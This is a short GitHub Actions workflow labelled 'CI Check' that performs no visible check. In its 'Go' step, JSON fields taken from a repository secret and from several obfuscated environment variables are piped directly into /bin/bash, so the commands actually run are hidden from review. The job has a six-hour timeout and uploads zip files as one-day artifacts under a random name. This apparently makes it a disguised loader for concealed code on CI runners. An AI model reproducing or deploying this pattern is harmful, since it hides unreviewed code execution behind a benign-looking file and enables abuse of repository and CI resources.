name: CI Check
on:
  workflow_dispatch:

permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          nycfm32798: ${{ secrets.nycfm32798 }}
        run: |
          printf '%s' "$nycfm32798" | jq -r .kp7525 | /bin/bash
          printf '%s' "$y17" | jq -r .m54 | /bin/bash
          echo $hjwls2 | jq -r .jnqi66912 | /bin/bash
          echo $ka8 | jq -r .ref33 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: GP1vzWJk
          path: "*.zip"
          retention-days: 1
